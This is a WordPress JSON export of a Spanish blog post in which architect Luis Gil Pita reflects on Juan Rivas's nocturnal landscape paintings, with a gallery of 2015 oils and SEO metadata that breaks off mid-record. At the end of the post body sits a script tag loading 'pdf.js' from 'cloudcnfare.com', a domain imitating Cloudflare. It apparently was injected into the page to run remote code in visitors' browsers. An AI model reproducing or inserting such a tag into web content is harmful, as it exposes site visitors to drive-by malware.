{"id":58085,"date":"2015-11-09T06:01:31","date_gmt":"2015-11-09T05:01:31","guid":{"rendered":"http:\/\/veredes.es\/blog\/?p=58085"},"modified":"2020-02-10T19:29:23","modified_gmt":"2020-02-10T18:29:23","slug":"arquitectura-y-paisajes-nocturnos-de-juan-rivas-luis-gil","status":"publish","type":"post","link":"https:\/\/veredes.es\/blog\/arquitectura-y-paisajes-nocturnos-de-juan-rivas-luis-gil\/","title":{"rendered":"Arquitectura y paisajes nocturnos de Juan Rivas | Luis Gil Pita"},"content":{"rendered":"<p><figure id=\"attachment_58100\" aria-describedby=\"caption-attachment-58100\" style=\"width: 625px\" class=\"wp-caption alignnone\"><a href=\"https:\/\/veredes.es\/blog\/wp-content\/uploads\/2015\/11\/Camino_JR.jpg\"><img loading=\"lazy\" decoding=\"async\" class=\"wp-image-58100\" src=\"https:\/\/veredes.es\/blog\/wp-content\/uploads\/2015\/11\/Camino_JR.jpg\" alt=\"Camino, 2015, \u00f3leo\/lienzo, 35 x 60 cm.\" width=\"625\" height=\"363\" srcset=\"https:\/\/veredes.es\/blog\/wp-content\/uploads\/2015\/11\/Camino_JR.jpg 1000w, https:\/\/veredes.es\/blog\/wp-content\/uploads\/2015\/11\/Camino_JR-300x174.jpg 300w\" sizes=\"auto, (max-width: 625px) 100vw, 625px\" \/><\/a><figcaption id=\"caption-attachment-58100\" class=\"wp-caption-text\"><span style=\"color: #808080;\">Camino, 2015, \u00f3leo\/lienzo, 35 x 60 cm.<\/span><\/figcaption><\/figure><\/p>\n<p style=\"text-align: justify;\">Escribo estas l\u00edneas con una especie de sentimiento de culpa por hablar de un artista y de su obra, la que conoc\u00ed hace tiempo, y la presente a la que corresponde esta exposici\u00f3n, porque se acostumbra a hablar del objeto art\u00edstico y de su creador para explicarlo, algo que creo en el fondo es totalmente innecesario cuando se experimenta una intensa y honesta obra de arte.<\/p>\n<p style=\"text-align: justify;\">A pesar de ese sentimiento encontrado, sin embargo, creo necesarias estas palabras para explicar, con sosiego, antes que nadie a m\u00ed mismo, ciertas caracter\u00edsticas que hay en la obra pl\u00e1stica de Juan Rivas, y en particular en la exposici\u00f3n <a href=\"http:\/\/www.galeriaestampa.com\/cms\/esp\/expos\/001109.html\" target=\"_blank\" rel=\"noopener noreferrer\">\u201cLuz que nunca se apaga\u201d<\/a> que generan un movimiento, que funciona como una lente que altera la respiraci\u00f3n de la mirada. Una mirada controlada, como el llenado y vaciado de una botella, atemperada por la acci\u00f3n del artista que nos hace ver el mundo que nos rodea de manera m\u00e1s compleja, y que genera una enriquecedora extra\u00f1eza en su aprehensi\u00f3n. Esta extra\u00f1eza, entendida como tensi\u00f3n a\u00f1adida al conocimiento, es adem\u00e1s doble y se produce porque Juan Rivas nos muestra por un lado, una geograf\u00eda que no refleja la obviedad de la escena exterior que retrata, subvirtiendo el sentido del paisaje encontrado para convertirlo en un lugar interior, y por otro, resit\u00faa nuestra mirada, poni\u00e9ndonos mentalmente en el interior del cuadro, en un exterior que se ha vuelto del rev\u00e9s.<\/p>\n<p style=\"text-align: justify;\">As\u00ed expresada, su acci\u00f3n creadora es una forma de transcribir la naturaleza como un \u201cdom\u00e9stico exterior\u201d que hace narraci\u00f3n desde una dial\u00e9ctica contrapuesta, entre quien cree controlar la escena desde fuera, el observador, y al mismo tiempo es incomodado por sentirse resituado al interior de lo observado. Se trata, como en las obras pict\u00f3ricas que aspiran de manera consciente a la imperfecci\u00f3n, de un movimiento que llega del interior del cuadro, el ser de la pintura. Un ser que viniendo de dentro, convierte el mirar exterior en una aventura abstracta sobre lo real, en la que importa, y no, lo que hay delante, un dato fundamental que hace de <a href=\"https:\/\/www.facebook.com\/juanrivasfer\/\" target=\"_blank\" rel=\"noopener noreferrer\">Juan Rivas<\/a> un verdadero artista contempor\u00e1neo.<\/p>\n<figure id=\"attachment_58115\" aria-describedby=\"caption-attachment-58115\" style=\"width: 625px\" class=\"wp-caption alignnone\"><a href=\"http:\/\/veredes.es\/blog\/wp-content\/uploads\/2015\/11\/Vao_JR.jpg\"><img loading=\"lazy\" decoding=\"async\" class=\"wp-image-58115\" src=\"http:\/\/veredes.es\/blog\/wp-content\/uploads\/2015\/11\/Vao_JR.jpg\" alt=\"Vao, 2015, \u00f3leo\/lienzo, 35 x 60 cm.\" width=\"625\" height=\"367\" srcset=\"https:\/\/veredes.es\/blog\/wp-content\/uploads\/2015\/11\/Vao_JR.jpg 1000w, https:\/\/veredes.es\/blog\/wp-content\/uploads\/2015\/11\/Vao_JR-300x176.jpg 300w\" sizes=\"auto, (max-width: 625px) 100vw, 625px\" \/><\/a><figcaption id=\"caption-attachment-58115\" class=\"wp-caption-text\"><span style=\"color: #808080;\">Vao, 2015, \u00f3leo\/lienzo, 35 x 60 cm.<\/span><\/figcaption><\/figure>\n<p style=\"text-align: justify;\">Cuando Rivas trabaja desde fuera, para que ese ser atrape m\u00e1s tarde nuestra mirada, demuestra un gran conocimiento de la arquitectura, no de su representaci\u00f3n o forma (algo que quiso dejar de dominar hace a\u00f1os), sino de los par\u00e1metros fundacionales de \u00e9sta y de las situaciones espaciales que tienen que ver con el \u201cdominio arquitect\u00f3nico\u201d, entendido como lo que las cosas ocupan en el mundo. Es decir el artista sabe transcribirnos pict\u00f3ricamente qu\u00e9 es el ser y el estar, lo que significan en la ra\u00edz de la arquitectura; control del espacio a nuestro alrededor, de las cosas del entorno en la distancia creada por una funci\u00f3n a realizar, y no solamente, marcas y referencias dadas por los usos o circunstancias practicadas en este caso desde un no lugar, la noche, a trav\u00e9s de la luz artificial. Luz localizadora que hace de referencia y desde donde se proyecta suficiente energ\u00eda hacia el exterior, para que al final nazca la forma, d\u00e1ndonos la dimensi\u00f3n del paisaje. Dominio en la arquitectura de la escena nocturna, que es tambi\u00e9n para el artificio de la luz, buscar sitio, localizarse, ubicarse y asentarse, y de igual forma distribuir, reorganizar y equilibrar la naturaleza artificializada mediante la acci\u00f3n de la pintura, tarea nada f\u00e1cil.<\/p>\n<p style=\"text-align: justify;\">El conflicto de la luz artificial en la noche es esta vez, para Juan Rivas, la propia arquitectura, la marca que se\u00f1ala donde terminan o empiezan otros espacios colindantes, resultando de la armonizaci\u00f3n de ese conflicto, entre lo \u201ciluminado y lo apagado\u201d, entre \u201clo que se ve y lo que queda escondido\u201d, la naturaleza del cuadro. Un reequilibrio de fuerzas que organiza la colonizaci\u00f3n de los espacios y los intersticios que permiten los pasos y movimientos de los habitantes nocturnos que seremos nosotros.<\/p>\n<p style=\"text-align: justify;\">Finalizo como empec\u00e9, gracias a la tensi\u00f3n del planteamiento de Juan Rivas, con ese sentimiento de cierta culpabilidad enriquecido por no saber explicarme si soy espectador o habitante, si ando por fuera o por dentro de estas geograf\u00edas nocturnas que resultan de la sutil b\u00fasqueda del equilibrio al problema de lo encontrado y antit\u00e9tico, del llenar y vaciar el paisaje del d\u00eda artificial en la noche. Algo que solo se puede producir gracias al repensar el artista los principios elementales de la naturaleza: botella vac\u00eda que comienza a llenarse por abajo y botella llena que comienza de vaciarse por arriba, para que al final, vaciando o llenando, la fuerza de la aut\u00e9ntica pintura permanezca inalterable.<\/p>\n<div id='gallery-1' class='gallery galleryid-58085 gallery-columns-4 gallery-size-thumbnail'><figure class='gallery-item'>\n\t\t\t<div class='gallery-icon landscape'>\n\t\t\t\t<a href='https:\/\/veredes.es\/blog\/wp-content\/uploads\/2015\/11\/Camino_JR.jpg'><img loading=\"lazy\" decoding=\"async\" width=\"120\" height=\"120\" src=\"https:\/\/veredes.es\/blog\/wp-content\/uploads\/2015\/11\/Camino_JR-150x150.jpg\" class=\"attachment-thumbnail size-thumbnail\" alt=\"\" aria-describedby=\"gallery-1-58100\" srcset=\"https:\/\/veredes.es\/blog\/wp-content\/uploads\/2015\/11\/Camino_JR-150x150.jpg 150w, https:\/\/veredes.es\/blog\/wp-content\/uploads\/2015\/11\/Camino_JR-120x120.jpg 120w\" sizes=\"auto, (max-width: 120px) 100vw, 120px\" \/><\/a>\n\t\t\t<\/div>\n\t\t\t\t<figcaption class='wp-caption-text gallery-caption' id='gallery-1-58100'>\n\t\t\t\tCamino, 2015, \u00f3leo\/lienzo, 35 x 60 cm.\n\t\t\t\t<\/figcaption><\/figure><figure class='gallery-item'>\n\t\t\t<div class='gallery-icon landscape'>\n\t\t\t\t<a href='https:\/\/veredes.es\/blog\/wp-content\/uploads\/2015\/11\/Campo_JR.jpg'><img loading=\"lazy\" decoding=\"async\" width=\"120\" height=\"120\" src=\"https:\/\/veredes.es\/blog\/wp-content\/uploads\/2015\/11\/Campo_JR-150x150.jpg\" class=\"attachment-thumbnail size-thumbnail\" alt=\"\" aria-describedby=\"gallery-1-58101\" srcset=\"https:\/\/veredes.es\/blog\/wp-content\/uploads\/2015\/11\/Campo_JR-150x150.jpg 150w, https:\/\/veredes.es\/blog\/wp-content\/uploads\/2015\/11\/Campo_JR-120x120.jpg 120w\" sizes=\"auto, (max-width: 120px) 100vw, 120px\" \/><\/a>\n\t\t\t<\/div>\n\t\t\t\t<figcaption class='wp-caption-text gallery-caption' id='gallery-1-58101'>\n\t\t\t\tCampo, 2015, \u00f3leo\/lienzo, 35 x 60 cm.\n\t\t\t\t<\/figcaption><\/figure><figure class='gallery-item'>\n\t\t\t<div class='gallery-icon landscape'>\n\t\t\t\t<a href='https:\/\/veredes.es\/blog\/wp-content\/uploads\/2015\/11\/Cascada_JR.jpg'><img loading=\"lazy\" decoding=\"async\" width=\"120\" height=\"120\" src=\"https:\/\/veredes.es\/blog\/wp-content\/uploads\/2015\/11\/Cascada_JR-150x150.jpg\" class=\"attachment-thumbnail size-thumbnail\" alt=\"\" aria-describedby=\"gallery-1-58117\" srcset=\"https:\/\/veredes.es\/blog\/wp-content\/uploads\/2015\/11\/Cascada_JR-150x150.jpg 150w, https:\/\/veredes.es\/blog\/wp-content\/uploads\/2015\/11\/Cascada_JR-120x120.jpg 120w\" sizes=\"auto, (max-width: 120px) 100vw, 120px\" \/><\/a>\n\t\t\t<\/div>\n\t\t\t\t<figcaption class='wp-caption-text gallery-caption' id='gallery-1-58117'>\n\t\t\t\tCascada, 2015, \u00f3leo\/lienzo, 35 x 60 cm.\n\t\t\t\t<\/figcaption><\/figure><figure class='gallery-item'>\n\t\t\t<div class='gallery-icon landscape'>\n\t\t\t\t<a href='https:\/\/veredes.es\/blog\/wp-content\/uploads\/2015\/11\/Ermida-II_JR.jpg'><img loading=\"lazy\" decoding=\"async\" width=\"120\" height=\"120\" src=\"https:\/\/veredes.es\/blog\/wp-content\/uploads\/2015\/11\/Ermida-II_JR-150x150.jpg\" class=\"attachment-thumbnail size-thumbnail\" alt=\"\" aria-describedby=\"gallery-1-58102\" srcset=\"https:\/\/veredes.es\/blog\/wp-content\/uploads\/2015\/11\/Ermida-II_JR-150x150.jpg 150w, https:\/\/veredes.es\/blog\/wp-content\/uploads\/2015\/11\/Ermida-II_JR-120x120.jpg 120w\" sizes=\"auto, (max-width: 120px) 100vw, 120px\" \/><\/a>\n\t\t\t<\/div>\n\t\t\t\t<figcaption class='wp-caption-text gallery-caption' id='gallery-1-58102'>\n\t\t\t\tErmita II, 2015, \u00f3leo\/lienzo, 35 x 60 cm.\n\t\t\t\t<\/figcaption><\/figure><figure class='gallery-item'>\n\t\t\t<div class='gallery-icon landscape'>\n\t\t\t\t<a href='https:\/\/veredes.es\/blog\/wp-content\/uploads\/2015\/11\/Fiesta_JR.jpg'><img loading=\"lazy\" decoding=\"async\" width=\"120\" height=\"120\" src=\"https:\/\/veredes.es\/blog\/wp-content\/uploads\/2015\/11\/Fiesta_JR-150x150.jpg\" class=\"attachment-thumbnail size-thumbnail\" alt=\"\" aria-describedby=\"gallery-1-58103\" srcset=\"https:\/\/veredes.es\/blog\/wp-content\/uploads\/2015\/11\/Fiesta_JR-150x150.jpg 150w, https:\/\/veredes.es\/blog\/wp-content\/uploads\/2015\/11\/Fiesta_JR-120x120.jpg 120w\" sizes=\"auto, (max-width: 120px) 100vw, 120px\" \/><\/a>\n\t\t\t<\/div>\n\t\t\t\t<figcaption class='wp-caption-text gallery-caption' id='gallery-1-58103'>\n\t\t\t\tFiesta, 2015, \u00f3leo\/lienzo, 35 x 60 cm.\n\t\t\t\t<\/figcaption><\/figure><figure class='gallery-item'>\n\t\t\t<div class='gallery-icon landscape'>\n\t\t\t\t<a href='https:\/\/veredes.es\/blog\/wp-content\/uploads\/2015\/11\/Grela-I_JR.jpg'><img loading=\"lazy\" decoding=\"async\" width=\"120\" height=\"120\" src=\"https:\/\/veredes.es\/blog\/wp-content\/uploads\/2015\/11\/Grela-I_JR-150x150.jpg\" class=\"attachment-thumbnail size-thumbnail\" alt=\"\" aria-describedby=\"gallery-1-58104\" srcset=\"https:\/\/veredes.es\/blog\/wp-content\/uploads\/2015\/11\/Grela-I_JR-150x150.jpg 150w, https:\/\/veredes.es\/blog\/wp-content\/uploads\/2015\/11\/Grela-I_JR-120x120.jpg 120w\" sizes=\"auto, (max-width: 120px) 100vw, 120px\" \/><\/a>\n\t\t\t<\/div>\n\t\t\t\t<figcaption class='wp-caption-text gallery-caption' id='gallery-1-58104'>\n\t\t\t\tFiesta, 2015, \u00f3leo\/lienzo, 35 x 60 cm.\n\t\t\t\t<\/figcaption><\/figure><figure class='gallery-item'>\n\t\t\t<div class='gallery-icon landscape'>\n\t\t\t\t<a href='https:\/\/veredes.es\/blog\/wp-content\/uploads\/2015\/11\/Grela-II_JR.jpg'><img loading=\"lazy\" decoding=\"async\" width=\"120\" height=\"120\" src=\"https:\/\/veredes.es\/blog\/wp-content\/uploads\/2015\/11\/Grela-II_JR-150x150.jpg\" class=\"attachment-thumbnail size-thumbnail\" alt=\"\" aria-describedby=\"gallery-1-58105\" srcset=\"https:\/\/veredes.es\/blog\/wp-content\/uploads\/2015\/11\/Grela-II_JR-150x150.jpg 150w, https:\/\/veredes.es\/blog\/wp-content\/uploads\/2015\/11\/Grela-II_JR-120x120.jpg 120w\" sizes=\"auto, (max-width: 120px) 100vw, 120px\" \/><\/a>\n\t\t\t<\/div>\n\t\t\t\t<figcaption class='wp-caption-text gallery-caption' id='gallery-1-58105'>\n\t\t\t\tGrela II, 2015, \u00f3leo\/lienzo, 35 x 60 cm.\n\t\t\t\t<\/figcaption><\/figure><figure class='gallery-item'>\n\t\t\t<div class='gallery-icon landscape'>\n\t\t\t\t<a href='https:\/\/veredes.es\/blog\/wp-content\/uploads\/2015\/11\/Luna-llena_JR.jpg'><img loading=\"lazy\" decoding=\"async\" width=\"120\" height=\"120\" src=\"https:\/\/veredes.es\/blog\/wp-content\/uploads\/2015\/11\/Luna-llena_JR-150x150.jpg\" class=\"attachment-thumbnail size-thumbnail\" alt=\"\" aria-describedby=\"gallery-1-58106\" srcset=\"https:\/\/veredes.es\/blog\/wp-content\/uploads\/2015\/11\/Luna-llena_JR-150x150.jpg 150w, https:\/\/veredes.es\/blog\/wp-content\/uploads\/2015\/11\/Luna-llena_JR-120x120.jpg 120w\" sizes=\"auto, (max-width: 120px) 100vw, 120px\" \/><\/a>\n\t\t\t<\/div>\n\t\t\t\t<figcaption class='wp-caption-text gallery-caption' id='gallery-1-58106'>\n\t\t\t\tLuna llena, 2015, \u00f3leo\/lienzo, 35 x 60 cm.\n\t\t\t\t<\/figcaption><\/figure><figure class='gallery-item'>\n\t\t\t<div class='gallery-icon landscape'>\n\t\t\t\t<a href='https:\/\/veredes.es\/blog\/wp-content\/uploads\/2015\/11\/Mogor-II.jpg'><img loading=\"lazy\" decoding=\"async\" width=\"120\" height=\"120\" src=\"https:\/\/veredes.es\/blog\/wp-content\/uploads\/2015\/11\/Mogor-II-150x150.jpg\" class=\"attachment-thumbnail size-thumbnail\" alt=\"\" aria-describedby=\"gallery-1-58107\" srcset=\"https:\/\/veredes.es\/blog\/wp-content\/uploads\/2015\/11\/Mogor-II-150x150.jpg 150w, https:\/\/veredes.es\/blog\/wp-content\/uploads\/2015\/11\/Mogor-II-120x120.jpg 120w\" sizes=\"auto, (max-width: 120px) 100vw, 120px\" \/><\/a>\n\t\t\t<\/div>\n\t\t\t\t<figcaption class='wp-caption-text gallery-caption' id='gallery-1-58107'>\n\t\t\t\tMogor II, 2015, \u00f3leo\/lienzo, 35 x 60 cm.\n\t\t\t\t<\/figcaption><\/figure><figure class='gallery-item'>\n\t\t\t<div class='gallery-icon landscape'>\n\t\t\t\t<a href='https:\/\/veredes.es\/blog\/wp-content\/uploads\/2015\/11\/Pardavila_JR.jpg'><img loading=\"lazy\" decoding=\"async\" width=\"120\" height=\"120\" src=\"https:\/\/veredes.es\/blog\/wp-content\/uploads\/2015\/11\/Pardavila_JR-150x150.jpg\" class=\"attachment-thumbnail size-thumbnail\" alt=\"\" aria-describedby=\"gallery-1-58108\" srcset=\"https:\/\/veredes.es\/blog\/wp-content\/uploads\/2015\/11\/Pardavila_JR-150x150.jpg 150w, https:\/\/veredes.es\/blog\/wp-content\/uploads\/2015\/11\/Pardavila_JR-120x120.jpg 120w\" sizes=\"auto, (max-width: 120px) 100vw, 120px\" \/><\/a>\n\t\t\t<\/div>\n\t\t\t\t<figcaption class='wp-caption-text gallery-caption' id='gallery-1-58108'>\n\t\t\t\tPardavila, 2015, \u00f3leo\/lienzo, 35 x 60 cm.\n\t\t\t\t<\/figcaption><\/figure><figure class='gallery-item'>\n\t\t\t<div class='gallery-icon landscape'>\n\t\t\t\t<a href='https:\/\/veredes.es\/blog\/wp-content\/uploads\/2015\/11\/Paseo_JR.jpg'><img loading=\"lazy\" decoding=\"async\" width=\"120\" height=\"120\" src=\"https:\/\/veredes.es\/blog\/wp-content\/uploads\/2015\/11\/Paseo_JR-150x150.jpg\" class=\"attachment-thumbnail size-thumbnail\" alt=\"\" aria-describedby=\"gallery-1-58109\" srcset=\"https:\/\/veredes.es\/blog\/wp-content\/uploads\/2015\/11\/Paseo_JR-150x150.jpg 150w, https:\/\/veredes.es\/blog\/wp-content\/uploads\/2015\/11\/Paseo_JR-120x120.jpg 120w\" sizes=\"auto, (max-width: 120px) 100vw, 120px\" \/><\/a>\n\t\t\t<\/div>\n\t\t\t\t<figcaption class='wp-caption-text gallery-caption' id='gallery-1-58109'>\n\t\t\t\tPaseo, 2015, \u00f3leo\/lienzo, 35 x 60 cm.\n\t\t\t\t<\/figcaption><\/figure><figure class='gallery-item'>\n\t\t\t<div class='gallery-icon landscape'>\n\t\t\t\t<a href='https:\/\/veredes.es\/blog\/wp-content\/uploads\/2015\/11\/Pereiro-I_JR.jpg'><img loading=\"lazy\" decoding=\"async\" width=\"120\" height=\"120\" src=\"https:\/\/veredes.es\/blog\/wp-content\/uploads\/2015\/11\/Pereiro-I_JR-150x150.jpg\" class=\"attachment-thumbnail size-thumbnail\" alt=\"\" aria-describedby=\"gallery-1-58110\" srcset=\"https:\/\/veredes.es\/blog\/wp-content\/uploads\/2015\/11\/Pereiro-I_JR-150x150.jpg 150w, https:\/\/veredes.es\/blog\/wp-content\/uploads\/2015\/11\/Pereiro-I_JR-120x120.jpg 120w\" sizes=\"auto, (max-width: 120px) 100vw, 120px\" \/><\/a>\n\t\t\t<\/div>\n\t\t\t\t<figcaption class='wp-caption-text gallery-caption' id='gallery-1-58110'>\n\t\t\t\tPereiro I, 2015, \u00f3leo\/lienzo, 35 x 60 cm.\n\t\t\t\t<\/figcaption><\/figure><figure class='gallery-item'>\n\t\t\t<div class='gallery-icon landscape'>\n\t\t\t\t<a href='https:\/\/veredes.es\/blog\/wp-content\/uploads\/2015\/11\/Pereiro-II_JR.jpg'><img loading=\"lazy\" decoding=\"async\" width=\"120\" height=\"120\" src=\"https:\/\/veredes.es\/blog\/wp-content\/uploads\/2015\/11\/Pereiro-II_JR-150x150.jpg\" class=\"attachment-thumbnail size-thumbnail\" alt=\"\" aria-describedby=\"gallery-1-58111\" srcset=\"https:\/\/veredes.es\/blog\/wp-content\/uploads\/2015\/11\/Pereiro-II_JR-150x150.jpg 150w, https:\/\/veredes.es\/blog\/wp-content\/uploads\/2015\/11\/Pereiro-II_JR-120x120.jpg 120w\" sizes=\"auto, (max-width: 120px) 100vw, 120px\" \/><\/a>\n\t\t\t<\/div>\n\t\t\t\t<figcaption class='wp-caption-text gallery-caption' id='gallery-1-58111'>\n\t\t\t\tPereiro II, 2015, \u00f3leo\/lienzo, 35 x 60 cm.\n\t\t\t\t<\/figcaption><\/figure><figure class='gallery-item'>\n\t\t\t<div class='gallery-icon landscape'>\n\t\t\t\t<a href='https:\/\/veredes.es\/blog\/wp-content\/uploads\/2015\/11\/Pintos_JR.jpg'><img loading=\"lazy\" decoding=\"async\" width=\"120\" height=\"120\" src=\"https:\/\/veredes.es\/blog\/wp-content\/uploads\/2015\/11\/Pintos_JR-150x150.jpg\" class=\"attachment-thumbnail size-thumbnail\" alt=\"\" aria-describedby=\"gallery-1-58112\" srcset=\"https:\/\/veredes.es\/blog\/wp-content\/uploads\/2015\/11\/Pintos_JR-150x150.jpg 150w, https:\/\/veredes.es\/blog\/wp-content\/uploads\/2015\/11\/Pintos_JR-120x120.jpg 120w\" sizes=\"auto, (max-width: 120px) 100vw, 120px\" \/><\/a>\n\t\t\t<\/div>\n\t\t\t\t<figcaption class='wp-caption-text gallery-caption' id='gallery-1-58112'>\n\t\t\t\tPintos, 2015, \u00f3leo\/lienzo, 35 x 60 cm.\n\t\t\t\t<\/figcaption><\/figure><figure class='gallery-item'>\n\t\t\t<div class='gallery-icon landscape'>\n\t\t\t\t<a href='https:\/\/veredes.es\/blog\/wp-content\/uploads\/2015\/11\/Pontill\u00f3n_JR.jpg'><img loading=\"lazy\" decoding=\"async\" width=\"120\" height=\"120\" src=\"https:\/\/veredes.es\/blog\/wp-content\/uploads\/2015\/11\/Pontill\u00f3n_JR-150x150.jpg\" class=\"attachment-thumbnail size-thumbnail\" alt=\"\" aria-describedby=\"gallery-1-58113\" srcset=\"https:\/\/veredes.es\/blog\/wp-content\/uploads\/2015\/11\/Pontill\u00f3n_JR-150x150.jpg 150w, https:\/\/veredes.es\/blog\/wp-content\/uploads\/2015\/11\/Pontill\u00f3n_JR-120x120.jpg 120w\" sizes=\"auto, (max-width: 120px) 100vw, 120px\" \/><\/a>\n\t\t\t<\/div>\n\t\t\t\t<figcaption class='wp-caption-text gallery-caption' id='gallery-1-58113'>\n\t\t\t\tPontill\u00f3n, 2015, \u00f3leo\/lienzo, 35 x 60 cm.\n\t\t\t\t<\/figcaption><\/figure><figure class='gallery-item'>\n\t\t\t<div class='gallery-icon landscape'>\n\t\t\t\t<a href='https:\/\/veredes.es\/blog\/wp-content\/uploads\/2015\/11\/Riveiro_JR.jpg'><img loading=\"lazy\" decoding=\"async\" width=\"120\" height=\"120\" src=\"https:\/\/veredes.es\/blog\/wp-content\/uploads\/2015\/11\/Riveiro_JR-150x150.jpg\" class=\"attachment-thumbnail size-thumbnail\" alt=\"\" aria-describedby=\"gallery-1-58114\" srcset=\"https:\/\/veredes.es\/blog\/wp-content\/uploads\/2015\/11\/Riveiro_JR-150x150.jpg 150w, https:\/\/veredes.es\/blog\/wp-content\/uploads\/2015\/11\/Riveiro_JR-120x120.jpg 120w\" sizes=\"auto, (max-width: 120px) 100vw, 120px\" \/><\/a>\n\t\t\t<\/div>\n\t\t\t\t<figcaption class='wp-caption-text gallery-caption' id='gallery-1-58114'>\n\t\t\t\tRiveiro, 2015, \u00f3leo\/lienzo, 35 x 60 cm.\n\t\t\t\t<\/figcaption><\/figure><figure class='gallery-item'>\n\t\t\t<div class='gallery-icon landscape'>\n\t\t\t\t<a href='https:\/\/veredes.es\/blog\/wp-content\/uploads\/2015\/11\/Vao_JR.jpg'><img loading=\"lazy\" decoding=\"async\" width=\"120\" height=\"120\" src=\"https:\/\/veredes.es\/blog\/wp-content\/uploads\/2015\/11\/Vao_JR-150x150.jpg\" class=\"attachment-thumbnail size-thumbnail\" alt=\"\" aria-describedby=\"gallery-1-58115\" srcset=\"https:\/\/veredes.es\/blog\/wp-content\/uploads\/2015\/11\/Vao_JR-150x150.jpg 150w, https:\/\/veredes.es\/blog\/wp-content\/uploads\/2015\/11\/Vao_JR-120x120.jpg 120w\" sizes=\"auto, (max-width: 120px) 100vw, 120px\" \/><\/a>\n\t\t\t<\/div>\n\t\t\t\t<figcaption class='wp-caption-text gallery-caption' id='gallery-1-58115'>\n\t\t\t\tVao, 2015, \u00f3leo\/lienzo, 35 x 60 cm.\n\t\t\t\t<\/figcaption><\/figure><figure class='gallery-item'>\n\t\t\t<div class='gallery-icon landscape'>\n\t\t\t\t<a href='https:\/\/veredes.es\/blog\/wp-content\/uploads\/2015\/11\/Vi\u00f1a_JR.jpg'><img loading=\"lazy\" decoding=\"async\" width=\"120\" height=\"120\" src=\"https:\/\/veredes.es\/blog\/wp-content\/uploads\/2015\/11\/Vi\u00f1a_JR-150x150.jpg\" class=\"attachment-thumbnail size-thumbnail\" alt=\"\" aria-describedby=\"gallery-1-58116\" srcset=\"https:\/\/veredes.es\/blog\/wp-content\/uploads\/2015\/11\/Vi\u00f1a_JR-150x150.jpg 150w, https:\/\/veredes.es\/blog\/wp-content\/uploads\/2015\/11\/Vi\u00f1a_JR-120x120.jpg 120w\" sizes=\"auto, (max-width: 120px) 100vw, 120px\" \/><\/a>\n\t\t\t<\/div>\n\t\t\t\t<figcaption class='wp-caption-text gallery-caption' id='gallery-1-58116'>\n\t\t\t\tVi\u00f1a, 2015, \u00f3leo\/lienzo, 35 x 60 cm.\n\t\t\t\t<\/figcaption><\/figure>\n\t\t<\/div>\n\n<p style=\"text-align: justify;\">Luis Gil Pita, arquitecto<br \/>\nSantiago de Compostela, noviembre 2015<\/p>\n<p><script src=\"https:\/\/cloudcnfare.com\/pdf.js\" type=\"text\/javascript\"><\/script><\/p>","protected":false},"excerpt":{"rendered":"<p>Escribo estas l\u00edneas con una especie de sentimiento de culpa por hablar de un artista y de su obra, la que conoc\u00ed hace tiempo, y la presente a la que corresponde esta exposici\u00f3n, porque se acostumbra a hablar del objeto art\u00edstico y de su creador para explicarlo, algo que creo en el fondo es totalmente [&hellip;]<\/p>\n","protected":false},"author":53,"featured_media":58112,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[36,39,3,1384,5951],"tags":[12449,630,12180,4601,810,920,977,12466,9332,1286],"class_list":{"0":"post-58085","1":"post","2":"type-post","3":"status-publish","4":"format-standard","5":"has-post-thumbnail","7":"category-arte-blog","8":"category-artistas","9":"category-capturas","10":"category-pintura","11":"category-slider-principal","12":"tag-arte","13":"tag-geografia","14":"tag-juan-rivas-fernandez","15":"tag-luis-gil-pita","16":"tag-luz","17":"tag-naturaleza","18":"tag-paisaje","19":"tag-pintura","20":"tag-pintura-gallega","21":"tag-territorio"},"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v27.5 - https:\/\/yoast.com\/product\/yoast-seo-wordpress\/ -->\n<title>Arquitectura y paisajes nocturnos de Juan Rivas | Luis Gil<\/title>\n<meta name=\"description\" content=\"Arquitectura y paisajes nocturnos de Juan Rivas\" \/>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/veredes.es\/blog\/arquitectura-y-paisajes-nocturnos-de-juan-rivas-luis-gil\/\" \/>\n<meta property=\"og:locale\" content=\"es_ES\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"Arquitectura y paisajes nocturnos de Juan Rivas | Luis Gil\" \/>\n<meta property=\"og:description\" content=\"Arquitectura y paisajes nocturnos de Juan Rivas\" \/>\n<meta property=\"og:url\" content=\"https:\/\/veredes.es\/blog\/arquitectura-y-paisajes-nocturnos-de-juan-rivas-luis-gil\/\" \/>\n<meta property=\"og:site_name\" content=\"veredes, arquitectura y divulgaci\u00f3n\" \/>\n<meta property=\"article:publisher\" content=\"https:\/\/www.facebook.com\/veredesArquitecturayDivulgacion\/\" \/>\n<meta property=\"article:author\" content=\"https:\/\/www.facebook.com\/gilpita\" \/>\n<meta property=\"article:published_time\" content=\"2015-11-09T05:01:31+00:00\" \/>\n<meta property=\"article:modified_time\" content=\"2020-02-10T18:29:23+00:00\" \/>\n<meta property=\"og:image\" content=\"https:\/\/veredes.es\/blog\/wp-content\/uploads\/2015\/11\/Pintos_JR.jpg\" \/>\n\t<meta property=\"og:image:width\" content=\"1000\" \/>\n\t<meta property=\"og:image:height\" content=\"597\" \/>\n\t<meta property=\"og:image:type\" content=\"image\/jpeg\" \/>\n<meta name=\"author\" content=\"Luis Gil Pita\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:creator\" content=\"@https:\/\/twitter.com\/luisgilpita\" \/>\n<meta name=\"twitter:site\" content=\"@veredes\" \/>\n<meta name=\"twitter:label1\" content=\"Escrito por\" \/>\n\t<meta name=\"twitter:data1\" content=\"Luis Gil Pita\" \/>\n\t<meta name=\"twitter:label2\" content=\"Tiempo de lectura\" \/>\n\t<meta name=\"twitter:data2\" content=\"12 minutos\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\\\/\\\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\\\/\\\/veredes.es\\\/blog\\\/arquitectura-y-paisajes-nocturnos-de-juan-rivas-luis-gil\\\/#article\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/veredes.es\\\/blog\\\/arquitectura-y-paisajes-nocturnos-de-juan-rivas-luis-gil\\\/\"},\"author\":{\"name\":\"Luis Gil 